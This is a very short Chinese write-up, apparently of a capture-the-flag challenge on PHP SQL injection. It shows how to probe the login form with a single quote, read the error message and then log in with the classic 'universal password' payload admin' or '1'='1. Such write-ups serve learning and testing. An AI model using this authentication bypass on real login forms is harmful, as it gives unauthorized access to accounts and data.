知识背景 PHP SQL注入漏洞 万能密码 解题过程 首先在用户名处输入单引号判断一下闭合方式 发现可以显示报错信息 可以判断闭合方式为单引号 尝试使用万能密码绕过 payload ?username=admin' or '1'='1&password=test' or '1'='1